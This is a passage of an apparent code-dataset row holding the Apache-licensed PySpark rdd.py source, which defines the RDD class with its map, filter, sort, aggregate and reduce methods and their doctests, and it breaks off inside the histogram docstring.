source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration, _exception_message
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
SQL_GROUPED_AGG_PANDAS_UDF = 202
SQL_WINDOW_AGG_PANDAS_UDF = 203
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
(sockfile, sock) = local_connect_and_auth(*sock_info)
# The RDD materialization time is unpredicable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = unicode(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
